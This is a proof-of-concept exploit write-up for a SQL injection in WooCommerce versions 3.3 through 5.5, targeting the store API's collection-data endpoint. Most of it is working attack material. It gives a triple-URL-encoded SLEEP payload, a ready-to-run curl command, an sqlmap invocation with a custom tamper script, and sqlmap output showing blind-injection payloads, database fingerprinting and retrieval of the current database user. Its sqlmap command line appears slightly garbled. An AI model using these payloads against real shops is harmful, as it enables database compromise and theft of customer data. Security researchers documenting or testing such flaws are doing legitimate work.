Proof of Concept exploit for WooCommerce 3.3-5.5 SQL Injection with SQLmap tamper

WooCommerce 3.3 through 5.5 are vulnerable to SQL injection due to lack of parameter sanitization.

Endpoint Affeted: /wp-json/wc/store/products/collection-data
Parameter: calculate_attribute_counts[][taxonomy]=INJECTION&calculate_attribute_counts[][query_type]=and

Basic Sleep Proof of Concept:
poc”) OR SLEEP(1)#

Payload must be triple URL encoded to properly escape “wc_sanitize_taxonomy_name” function.

time curl -sik ‘https://EXAMPLE.TLD/wp-json/wc/store/products/collection-data?calculate_attribute_counts\[\]\[query_type\]=and&calculate_attribute_counts\[\]\[taxonomy\]=poc%252522%252529%252520OR%252520SLEEP%2525281%252529%252523’

In order to automate this exploit using SQLmap, one needs to create a tamper script to be able to pre-parse and triple URL encode the payload.

# python -c woo.conf --level 5 --risk 3 --tamper=tripleencode

[*] starting @ 00:10:22 /2021-07-16/

[00:10:22] [INFO] loading tamper module 'tripleencode'
[00:10:22] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: calculate_attribute_counts[][taxonomy] (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: calculate_attribute_counts[][taxonomy]=-3883") OR 8761=8761#&calculate_attribute_counts[][query_type]=and

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: calculate_attribute_counts[][taxonomy]=test") AND (SELECT 4628 FROM (SELECT(SLEEP(5)))lshD) AND ("IqjC"="IqjC&calculate_attribute_counts[][query_type]=and
[00:10:24] [INFO] the back-end DBMS is MySQL
[00:10:24] [INFO] fetching banner
[00:10:24] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:10:24] [INFO] retrieved: 5.7.33-0ubuntu0.16.04.1
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.0
banner: '5.7.33-0ubuntu0.16.04.1'
[00:10:42] [INFO] fetching current user
[00:10:42] [INFO] retrieved: root@%
current user: 'root@%'